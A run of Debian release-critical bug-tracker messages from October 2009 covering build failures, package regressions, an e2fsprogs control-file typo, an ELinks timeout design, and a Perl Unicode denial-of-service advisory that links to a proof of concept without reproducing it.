Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
[Thveillon] They have different sata controllers, and they don't display this behavior in neither Fedora11 (tested on the Desktop) and Ubuntu Karmic (on the laptop). Both use event based boot, as far as I know, which solve the fundamental problem with the changed kernel behaviour. Did it work with Debian Lenny? Let me know if I can provide any other information, or provide logs from a boot on a standard Debian kernel (those attached are from a custom one). Logs from a standard kernel would be nice, to see if device timings or driver load order is different. The output from 'ls /etc/rc?.d', 'ls -l $(grep -v '#' /etc/fstab|awk '/dev/ {print $1}') /dev/rtc*' and 'cat /etc/default/rcS' would be nice too. The system seem to be without udev. Is that correct? I noticed from the boot log that the hardware clock is not set correctly either, because the rtc devices are missing. Why do you make your own kernel? Anything special about its configuration? Happy hacking, -- Petter Reinholdtsen -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552288: FTBFS: `debian/exfalso/usr/share/pixmaps': No such file or directory
Package: quodlibet Version: 2.1-3 Severity: serious Justification: FTBFS Hi, quodlibet FTBFS on some architecture. https://buildd.debian.org/fetch.cgi?pkg=quodlibet;ver=2.1-3;arch=amd64;stamp=1256443935 - # install icon files cp debian/tmp$(_py_=`pyversions -d`; python${_py_#python*} -c 'from distutils import sysconfig; print(sysconfig.get_python_lib())')/quodlibet/images/exfalso.png debian/exfalso/usr/share/pixmaps cp: cannot create regular file `debian/exfalso/usr/share/pixmaps': No such file or directory make[1]: *** [override_dh_install] Error 1 make[1]: Leaving directory `/build/buildd/quodlibet-2.1' - Please check and fix this problem. Best regards, Nobuhiro -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686-bigmem (SMP w/2 CPU cores) Locale: LANG=ja_JP.UTF-8, LC_CTYPE=ja_JP.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545632: marked as done (libopengl-ruby: FTBFS: Nonexistent build-dependency: libglut-dev)
Your message dated Sun, 25 Oct 2009 06:02:04 + with message-id e1n1wb2-00046q...@ries.debian.org and subject line Bug#545632: fixed in libopengl-ruby 0.32f-2.1 has caused the Debian Bug report #545632, regarding libopengl-ruby: FTBFS: Nonexistent build-dependency: libglut-dev to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 545632: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=545632 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: libopengl-ruby Version: 0.32f-2 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090907 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: ** Using build dependencies supplied by package: Build-Depends: debhelper (= 4.0.0), ruby (= 1.8), ruby1.8-dev, xlibmesa-gl-dev | libgl-dev, libglut-dev ┌──┐ │ Install build dependencies │ └──┘ Checking for already installed source dependencies... W: Unable to locate package libglut-dev debhelper: missing Using default version 7.4.1 ruby: missing Using default version 4.2 ruby1.8-dev: missing xlibmesa-gl-dev: missing libgl-dev: missing libglut-dev: missing Checking for source dependency conflicts... E: Couldn't find package libglut-dev The full build log is available from: http://people.debian.org/~lucas/logs/2009/09/07/libopengl-ruby_0.32f-2_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: libopengl-ruby Source-Version: 0.32f-2.1 We believe that the bug you reported is fixed in the latest version of libopengl-ruby, which is due to be installed in the Debian FTP archive: libopengl-ruby_0.32f-2.1.diff.gz to pool/main/libo/libopengl-ruby/libopengl-ruby_0.32f-2.1.diff.gz libopengl-ruby_0.32f-2.1.dsc to pool/main/libo/libopengl-ruby/libopengl-ruby_0.32f-2.1.dsc libopengl-ruby_0.32f-2.1_i386.deb to pool/main/libo/libopengl-ruby/libopengl-ruby_0.32f-2.1_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 545...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Matt Kraai kr...@debian.org (supplier of updated libopengl-ruby package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Thu, 22 Oct 2009 22:18:14 -0700 Source: libopengl-ruby Binary: libopengl-ruby Architecture: source i386 Version: 0.32f-2.1 Distribution: unstable Urgency: low Maintainer: Dafydd Harries d...@debian.org Changed-By: Matt Kraai kr...@debian.org Description: libopengl-ruby - OpenGL binding for Ruby Closes: 545632 Changes: libopengl-ruby (0.32f-2.1) unstable; urgency=low . * Non-maintainer upload. * Build-depend on freeglut3-dev instead of libglut-dev. Closes: #545632. Checksums-Sha1: 87aa4e8fb5606ce3de6f11b0e887e73dc86929c8 1077 libopengl-ruby_0.32f-2.1.dsc d7240ad6e36a806065fe027a587b16c5eb3822f2 2433 libopengl-ruby_0.32f-2.1.diff.gz 6ca3ccc65e25de8c81153a5b78e049693f701b4d 153486 libopengl-ruby_0.32f-2.1_i386.deb Checksums-Sha256: 6c2a8809e286682299aa68d5a5434a77db882caf14a3eb0998a2d2ef584551df 1077 libopengl-ruby_0.32f-2.1.dsc 4e00a5e01c8eaa9eca014798dbd415d52faa6f7ea11270654a6cb1a814990311 2433 libopengl-ruby_0.32f-2.1.diff.gz f1e1976a748a7cc2ac96a63f67158808c6d470acb10317bb0e4ed3cf54c9d866 153486 libopengl-ruby_0.32f-2.1_i386.deb Files: 7080b09cefec4123a205b66295e009a7 1077 interpreters optional libopengl-ruby_0.32f-2.1.dsc 0a2de98433786df93e4f9b13d48d81b9 2433 interpreters optional libopengl-ruby_0.32f-2.1.diff.gz 207bca5f9dcb73af696f805a13b3804d 153486 interpreters
Bug#551795: e2fsprogs: /sbin/fsck lost on partial upgrades
On 2009-10-24 21:06 +0200, Theodore Tso wrote: diff --git a/debian/control.in b/debian/control.in index 5d5142c..842d5d0 100644 --- a/debian/control.in +++ b/debian/control.in @@ -228,7 +228,11 @@ Description: ext2/ext3/ext4 file system libraries - headers and static libraries Package: e2fsprogs Essential: yes -Pre-Depends: ${shlibs:Depends}, ${misc:Depends} +ifdef(`UTIL_LINUX_NG', +``Pre-Depends: ${shlibs:Depends}, ${misc:Depends}, util-linux ( 2.15~rc1-1) ^^ That seems to be a typo, surely you mean = instead of ? Cheers, Sven -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545366: dselect 1.15.4 does not distinguish between new and old packages
reopen 545366 thanks dselect 1.15.4.1 (with dpkg 1.15.4.1) still does not distinguish between new and old packages. This makes dselect mostly useless on upgrades and completely useless on adding new repositories. The only difference between 1.15.4 and 1.15.4.1 is that former marks new and old packages as new, and the latter marks new and old packages as old. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#545366: dselect 1.15.4 does not distinguish between new and old packages
Processing commands for cont...@bugs.debian.org: reopen 545366 Bug #545366 {Done: Guillem Jover guil...@debian.org} [dselect] dselect 1.15.4 does not distinguish between new and old packages 'reopen' may be inappropriate when a bug has been closed with a version; you may need to use 'found' to remove fixed versions. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552291: CVE-2009-3626: DoS in Unicode processing
Package: perl Version: 5.10.1-5 Severity: grave Tags: security Quoting a posting from Jan Lieskovsky/Red Hat to oss-security. I've verified that Etch and Lenny are not affected. Cheers, Moritz Hello Steve, vendors, Mark Martinec reported Perl crash while processing utf-8 character with large and invalid codepoint. References: -- https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6225 (original source) http://rt.perl.org/rt3/Public/Bug/Display.html?id=69973 (perl bug) http://rt.perl.org/rt3/Ticket/Attachment/617489/295383/ (PoC) Affected versions: -- Have checked Perl of versions perl-5.8.0, perl-5.8.5, perl-5.8.8, perl-5.10.0 is not vulnerable to this flaw. Issue was confirmed in Perl of version perl-5.10.1, as available at: http://www.cpan.org/src/perl-5.10.1.tar.gz CVE identifier: --- CVE identifier of CVE-2009-3626 has been already assigned to this issue. --- -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.30-2-686 (SMP w/1 CPU core) Locale: LANG=C, lc_ctype=de_de.iso-8859...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages perl depends on: ii libbz2-1.0 1.0.5-3 high-quality block-sorting file co ii libc6 2.9-27GNU C Library: Shared libraries ii libdb4.7 4.7.25-8 Berkeley v4.7 Database Libraries [ ii libgdbm3 1.8.3-6+b1GNU dbm database routines (runtime ii perl-base 5.10.1-5 minimal Perl system ii perl-modules 5.10.1-5 Core Perl modules ii zlib1g 1:1.2.3.3.dfsg-15 compression library - runtime Versions of packages perl recommends: ii make 3.81-6 An utility for Directing compilati ii netbase 4.37 Basic TCP/IP networking system Versions of packages perl suggests: pn libterm-readline-gnu-perl | l none (no description available) ii perl-doc 5.10.1-5 Perl documentation -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#518735: [ace-users] [Pkg-ace-devel] Bug#518735: ace: FTBFS: autotools error
Hi, All the files from Thomas are part of the distribution, see ACE_wrappers/debianbuild. Part is updated, if you have patches for these debian package file, send them to the list, then we can integrate it. What is the real problem? Johnny On Sat, Oct 24, 2009 at 6:04 PM, Luk Claes l...@debian.org wrote: Hi Any further progress in getting this FTBFS fixed? I'm tempted to remove ace from testing if this bug does not get fixed soon. The only reverse dependency which prevents the removal will soon be diagnostics (maintainer Cc-ed). Please prove me wrong in wanting this package removed from testing and get the package fixed and maintained properly again, TIA. ACE is a big beast and is undermaintained because the Debian maintainer (Thomas Girard, the other two seem inactive) is too busy at the moment. I tried to take it over but the current packaging is, IMHO, very difficult to get to work. Too contrived. To fix this bug, the first thing I would try is moving to a new version of ACE (as of this writing, latest is 5.7.4), which has no trouble with current versions of autotools. Problem is ACE covers so many different things it is very difficult for a single person to know how to properly package this (I, for once, only have experience with the pure-ACE stuff, no TAO or anything else). For instance, there are new libraries since the latest packaged version in Debian (5.6.3), which I am now sure how to package (see http://lists.alioth.debian.org/pipermail/pkg-ace-devel/2009- May/001819.html ). If someone with experience in TAO and the non-pure-ACE stuff is willing to help me, I could get ACE in shape in a reasonable amount of time (yes, this is a call for help, please contact me). -- Pau Garcia i Quiles http://www.elpauer.org (Due to my workload, I may need 10 days to answer) ___ ace-users mailing list ace-us...@list.isis.vanderbilt.edu http://list.isis.vanderbilt.edu/mailman/listinfo/ace-users -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552291: CVE-2009-3626: DoS in Unicode processing
package perl perl-base reassign 552291 perl-base found 552291 perl-base/5.10.1-5 tags 552291 + confirmed upstream thanks Moritz Muehlenhoff wrote: Package: perl Version: 5.10.1-5 Severity: grave Tags: security Quoting a posting from Jan Lieskovsky/Red Hat to oss-security. I've verified that Etch and Lenny are not affected. Thanks for the report. An upstream fix is not yet available, waiting for it. -- Eugene V. Lyubimkin aka JackYF, JID: jackyf.devel(maildog)gmail.com C++/Perl developer, Debian Developer signature.asc Description: OpenPGP digital signature
Bug#551238: FTBFS: spidermonkey.c:(.text+0x52858): undefined reference to `JS_SetBranchCallback'
We discussed this in IRC on 2009-07-18. I think the plan was something like: * Don't add threads. * Use SIGALRM for both JS_TriggerOperationCallback and the select() race, with the same signal handler function. * Add a global variable that lists the scripts being evaluated. Each element of the list contains a JSContext * and a time_t. The list should normally have just 0 or 1 element so we don't need any fancy priority queue. * Add ecmascript_check_alarms(), which walks this list and calls JS_TriggerOperationCallback for each context whose timeout has expired. It then returns the number that should be passed to the next alarm() call. * Before each call to JS_EvaluateScript, construct a list element as an auto variable, add it to the list, and call alarm(ecmascript_check_alarms()). * After each call to JS_EvaluateScript, remove the element from the list, and call alarm(ecmascript_check_alarms()). * If e.g. Win32 doesn't support alarm(), don't implement the ECMAScript timeout there. * The old SIGALRM code (critical_section, pending_alarm, alarm_handler, check_for_select_race, uninstall_alarm) seems intended to handle the case where a signal occurs immediately before select() and ELinks would instead like it to interrupt the select(). (The race condition could be entirely prevented, by blocking the signals almost all the time and letting pselect() unblock them. That would however be less portable.) Because select_loop() is not called recursively, this should never get run during ECMAScript evaluation. Add some assertions for that. * There are some sleep() calls in error handlers. Replace those with a wrapper that calls alarm(ecmascript_check_alarms()) at the end, in case sleep() interfered with alarm(). pgpKsS6C1CmhM.pgp Description: PGP signature
Bug#549743: Forwarding [bug-gnupg-interf...@rt.cpan.org: Re: [rt.cpan.org #50348] FTBFS when compiling non-interactively]
I'm forwarding the reply of Maintainer of GnuPG::Interface. - Forwarded message from Jesse via RT bug-gnupg-interf...@rt.cpan.org - Date: Mon, 12 Oct 2009 14:40:50 -0400 From: Jesse via RT bug-gnupg-interf...@rt.cpan.org To: salvatore.bonacco...@gmail.com Subject: Re: [rt.cpan.org #50348] FTBFS when compiling non-interactively Reply-To: bug-gnupg-interf...@rt.cpan.org URL: https://rt.cpan.org/Ticket/Display.html?id=50348 Salvatore, So, I'm not the original author of GnuPG::Interface, just its caretaker. It looks like the original code is specifically testing gnupg's ability to read from /dev/tty as part of the test suite. I'd happily take a patch, but at fist glance, I'm not sure what the right fix is. Best, Jesse [...] - End forwarded message - signature.asc Description: Digital signature
Bug#518735: ACE
Hi, I would propose yout take a short at 5.7.4, all debian files from Thomas are under ACE_wrappers/debianbuild. We really want to get debian support inside the package, just as we did with rpm support for fedora/rhel under rpmbuild. Johnny -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#550316: broken cd-rom polling/detection with (legacy) ide-cd
I also tested it by re-installing a 2.6.26 kernel, and it is the same issue. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545366: marked as done (dselect 1.15.4 does not distinguish between new and old packages)
Your message dated Sun, 25 Oct 2009 11:40:41 +0100 with message-id 20091025104041.ge17...@rivendell and subject line Re: Bug#545366: dselect 1.15.4 does not distinguish between new and old packages has caused the Debian Bug report #545366, regarding dselect 1.15.4 does not distinguish between new and old packages to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 545366: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=545366 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: dselect Version: 1.15.4 Since today's update run dselect is completely confused and does not remember which packages are new and which are old - it lists all available and not installed packages as new, again and again. And not only that, it also marks some of them for installation although I do not want them (and some are not installable at all - for some reason it wants to install libsasl2 which is not installable together with libsasl2-2). I see that it updates available status, they seem to contain valid data, but on load it somehow ignores them. Besides that it creates some strange /var/lib/dpkg/updates/tmp.i which is full of lines saying '##padding', but other than that I do not see what can be wrong, and unfortunately diff between 1.15.3.1 and 1.15.4 is quite huge. Thanks, Petr ---End Message--- ---BeginMessage--- Version: 1.15.4.1 On Sun, 25 Oct 2009, Piotr Engelking wrote: The only difference between 1.15.4 and 1.15.4.1 is that former marks new and old packages as new, and the latter marks new and old packages as old. That's what we wanted. Closing this bug again. The fact that it doesn't keep track of new packages is tracked in #551638 and is not release critical for us. Please use the other bug for further discussion. Cheers, -- Raphaël Hertzog ---End Message---
Bug#552301: xtables-addons-source: package ships /lib/modules/$(uname -r)/modules.dep.bin
Package: xtables-addons-source Version: 1.19-1 Severity: grave Justification: renders package unusable Note: choosing severity grave as I think it renders the package unusable, please feel free to downgrade if you think that it won't affect all users. Problem: # apt-get install xtables-addons-modules-2.6.31-grml [...] Unpacking xtables-addons-modules-2.6.31-grml (from .../xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb) ... dpkg: error processing /var/cache/apt/archives/xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb (--unpack): trying to overwrite '/lib/modules/2.6.31-grml/modules.dep.bin', which is also in package linux-image-2.6.31-grml 0:grml.03 dpkg-deb: subprocess paste killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb [...] Reason: # dpkg -c xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb [...] -rw-r--r-- root/root 3778 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.dep.bin -rw-r--r-- root/root 2049 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.alias.bin -rw-r--r-- root/root 2230 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.dep -rw-r--r-- root/root 949 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.symbols.bin -rw-r--r-- root/root 846 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.symbols -rw-r--r-- root/root 1104 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.alias The xtables-addons-modules-2.6.31-grml package was built running: # m-a -k /path/to/linux-2.6.31.5 -k 2.6.31-grml build xtables-addons Solution: Do not ship any modules.* files through the main /lib/modules/$(uname -r)/ directory. regards, -mika- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552304: FTBFS on PPC and mips
Package: sqlite3 Version: 3.6.19-2 Severity: Serious Hi, Looks like sqlite3 FTBFS on powerpc and mips both with the same error: libtool: install: /usr/bin/install -c .libs/libtclsqlite3.a /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3/libtclsqlite3.a libtool: install: chmod 644 /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3/libtclsqlite3.a libtool: install: ranlib /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3/libtclsqlite3.a libtool: install: warning: remember to run `libtool --finish /usr/share/tcltk/tcl8.4/sqlite3' rm -f /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3/libtclsqlite3.la /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3/libtclsqlite3.a /usr/bin/install -c -m 0644 pkgIndex.tcl /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3 /usr/bin/install -c -d /build/buildd/sqlite3-3.6.19/debian/tmp//usr/bin ./libtool --mode=install /usr/bin/install -c sqlite3 /build/buildd/sqlite3-3.6.19/debian/tmp//usr/bin libtool: install: warning: `libsqlite3.la' has not been installed in `/usr/lib' libtool: install: /usr/bin/install -c .libs/sqlite3 /build/buildd/sqlite3-3.6.19/debian/tmp//usr/bin/sqlite3 /usr/bin/install -c -d /build/buildd/sqlite3-3.6.19/debian/tmp//usr/include /usr/bin/install -c -m 0644 sqlite3.h /build/buildd/sqlite3-3.6.19/debian/tmp//usr/include /usr/bin/install -c -m 0644 ./src/sqlite3ext.h /build/buildd/sqlite3-3.6.19/debian/tmp//usr/include /usr/bin/install -c -d /build/buildd/sqlite3-3.6.19/debian/tmp//usr/lib/pkgconfig /usr/bin/install -c -m 0644 sqlite3.pc /build/buildd/sqlite3-3.6.19/debian/tmp//usr/lib/pkgconfig make[1]: Leaving directory `/build/buildd/sqlite3-3.6.19' install -d debian/tmp/usr/lib/sqlite3/ install -m 0664 libtclsqlite3.la `pwd`/debian/tmp/usr/lib/sqlite3 chrpath -d debian/tmp/usr/bin/sqlite3 chrpath -d ./debian/tmp/usr/share/tcltk/tcl8.5/sqlite3/libtclsqlite3.so open: No such file or directory elf_open: Invalid argument make: *** [common-install-arch] Error 1 dpkg-buildpackage: error: /usr/bin/fakeroot debian/rules binary-arch gave error exit status 2 ** Build finished at 20091023-1447 FAILED [dpkg-buildpackage died] Laurent Bigonville -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552307: gnome-bluetooth: Build process relies on network availability
Package: gnome-blueeoth Version: 2.28.3-1 Severity: serious xsltproc -o gnome-bluetooth-sv.omf --stringparam db2omf.basename gnome-bluetooth --stringparam db2omf.format 'docbook' --stringparam db2omf.dtd -//OASIS//DTD DocBook XML V4.1.2//EN --stringparam db2omf.lang sv --stringparam db2omf.omf_dir /usr/share/omf --stringparam db2omf.help_dir /usr/share/gnome/help --stringparam db2omf.omf_in /build/buildd/gnome-bluetooth-2.28.3/help/gnome-bluetooth.omf.in `/usr/bin/pkg-config --variable db2omf gnome-doc-utils` sv/gnome-bluetooth.xml || { rm -f gnome-bluetooth-sv.omf; exit 1; } http://scrollkeeper.sourceforge.net/dtds/scrollkeeper-omf-1.0/scrollkeeper-omf.dtd:1: parser error : Content error in the external subset HTTP/1.1 504 Gateway Time-out ^ db2omf: Could not construct the OMF subject element. Add a subject element to /build/buildd/gnome-bluetooth-2.28.3/help/gnome-bluetooth.omf.in. make[3]: *** [gnome-bluetooth-sv.omf] Error 1 make[3]: Leaving directory `/build/buildd/gnome-bluetooth-2.28.3/help' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/build/buildd/gnome-bluetooth-2.28.3' make[1]: *** [all] Error 2 make[1]: Leaving directory `/build/buildd/gnome-bluetooth-2.28.3' make: *** [debian/stamp-makefile-build] Error 2 dpkg-buildpackage: error: debian/rules build gave error exit status 2 ** Build finished at 20091023-1315 FAILED [dpkg-buildpackage died] Relying on network access is forbidden for Debian builds. Kind regards, Philipp Kern -- .''`. Philipp KernDebian Developer : :' : http://philkern.de Stable Release Manager `. `' xmpp:p...@0x539.de Wanna-Build Admin `-finger pkern/k...@db.debian.org signature.asc Description: Digital signature
Bug#550131: marked as done (Please consider bump Build-Depends to libreadline6-dev | libreadline-dev)
Your message dated Sun, 25 Oct 2009 12:17:16 + with message-id e1n2228-0007wx...@ries.debian.org and subject line Bug#550131: fixed in guile-1.8 1.8.7+1-1.1 has caused the Debian Bug report #550131, regarding Please consider bump Build-Depends to libreadline6-dev | libreadline-dev to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 550131: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550131 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: guile-1.8 Version: 1.8.7+1-1 Severity: wishlist Please consider update Build-Depends to libreadline6-dev | libreadline-dev . Cheers, Trafire ---End Message--- ---BeginMessage--- Source: guile-1.8 Source-Version: 1.8.7+1-1.1 We believe that the bug you reported is fixed in the latest version of guile-1.8, which is due to be installed in the Debian FTP archive: guile-1.8-dev_1.8.7+1-1.1_amd64.deb to pool/main/g/guile-1.8/guile-1.8-dev_1.8.7+1-1.1_amd64.deb guile-1.8-doc_1.8.7+1-1.1_all.deb to pool/main/g/guile-1.8/guile-1.8-doc_1.8.7+1-1.1_all.deb guile-1.8-libs_1.8.7+1-1.1_amd64.deb to pool/main/g/guile-1.8/guile-1.8-libs_1.8.7+1-1.1_amd64.deb guile-1.8_1.8.7+1-1.1.diff.gz to pool/main/g/guile-1.8/guile-1.8_1.8.7+1-1.1.diff.gz guile-1.8_1.8.7+1-1.1.dsc to pool/main/g/guile-1.8/guile-1.8_1.8.7+1-1.1.dsc guile-1.8_1.8.7+1-1.1_amd64.deb to pool/main/g/guile-1.8/guile-1.8_1.8.7+1-1.1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 550...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jordi Mallach jo...@debian.org (supplier of updated guile-1.8 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Mon, 19 Oct 2009 18:20:34 +0200 Source: guile-1.8 Binary: guile-1.8 guile-1.8-dev guile-1.8-doc guile-1.8-libs Architecture: source all amd64 Version: 1.8.7+1-1.1 Distribution: unstable Urgency: medium Maintainer: Rob Browning r...@defaultvalue.org Changed-By: Jordi Mallach jo...@debian.org Description: guile-1.8 - The GNU extension language and Scheme interpreter guile-1.8-dev - Development files for Guile 1.8 guile-1.8-doc - Documentation for Guile 1.8 guile-1.8-libs - Main Guile libraries Closes: 550131 Changes: guile-1.8 (1.8.7+1-1.1) unstable; urgency=medium . * Non-maintainer upload. * Switch to libreadline-dev for Build-Depends and Depends of guile-1.8-dev. (closes: #550131) * Exclude usr/share/info/dir from dh_install call, and Depend on dpkg (= 1.15.4). * Add ${misc:Depends} to all packages. * Remove config.log from Debian diff. Checksums-Sha1: 8d11ea6bc426b93098a9d205b85e6fab4a1f0f0f 1158 guile-1.8_1.8.7+1-1.1.dsc a4665d99b010a6f6afc57e375cf6af58329e32de 385146 guile-1.8_1.8.7+1-1.1.diff.gz 463c4ca1caa739d6f3e3f47e921c179ffe4be4e1 114486 guile-1.8-doc_1.8.7+1-1.1_all.deb 81476d237847b718b6438d7e7f28eada175ed35a 10532 guile-1.8_1.8.7+1-1.1_amd64.deb 53516d37747ac12d368b6d036d9e0256ca73eb83 638544 guile-1.8-dev_1.8.7+1-1.1_amd64.deb 6e8b3414c39c6aaac235d7b8f190523faebe4870 750836 guile-1.8-libs_1.8.7+1-1.1_amd64.deb Checksums-Sha256: d2a33fc0c53815137672ea80c98a13318d908f452c249bdb01e7f76cad9e7708 1158 guile-1.8_1.8.7+1-1.1.dsc 3e8c4abe2d314dcd589a503988ee184c68652951c469bba92683fb350c10ce52 385146 guile-1.8_1.8.7+1-1.1.diff.gz 8319e4cf13b8fceb232d4dedde38a0d9ea7f3ca48aac4b7702211809468bd8c4 114486 guile-1.8-doc_1.8.7+1-1.1_all.deb 7104bf74cdf9df8076ea7df9f672a58258fab21ba9a554c2cd2ff99bb0153de1 10532 guile-1.8_1.8.7+1-1.1_amd64.deb 35788b0356b428bb9b78bab853560c76ca6ecb455963b204d89c36fb4166ac84 638544 guile-1.8-dev_1.8.7+1-1.1_amd64.deb 62749975adc4d2fd15af646e859cf2c032f8ab2e9509a1e715a86214bd02ace7 750836 guile-1.8-libs_1.8.7+1-1.1_amd64.deb Files: 4e7f9d64a520493925c1cd43456a77da 1158 interpreters optional guile-1.8_1.8.7+1-1.1.dsc 5805c6696b2f4fb7697cd5b038e19ca8 385146 interpreters optional guile-1.8_1.8.7+1-1.1.diff.gz f54b3f084360626c6e527a58df6a47e2 114486 doc optional guile-1.8-doc_1.8.7+1-1.1_all.deb ce67d66ca572107af963d9f794786204 10532 interpreters optional guile-1.8_1.8.7+1-1.1_amd64.deb dbae1cb7ce41d44b2cee6d419ec88e9f 638544 devel optional guile-1.8-dev_1.8.7+1-1.1_amd64.deb aeb807095ce6c4f6c097e3915c0fdcee
Bug#518735: ace: FTBFS: autotools error
Hi Any further progress in getting this FTBFS fixed? I'm tempted to remove ace from testing if this bug does not get fixed soon. The only reverse dependency which prevents the removal will soon be diagnostics (maintainer Cc-ed). Please prove me wrong in wanting this package removed from testing and get the package fixed and maintained properly again, TIA. Now I'd highly appreciate if ACE gets properly maintained and stays in Debian. Nevertheless, please don't consider diagnostics a blocker as diagnostics can also be built without ACE, at the expense of losing some non-essential features. Best, Michael pgp9YIFnuI8ZQ.pgp Description: PGP signature
Bug#548464: marked as done (tftp-hpa: FTBFS: Missing build-depends on quilt)
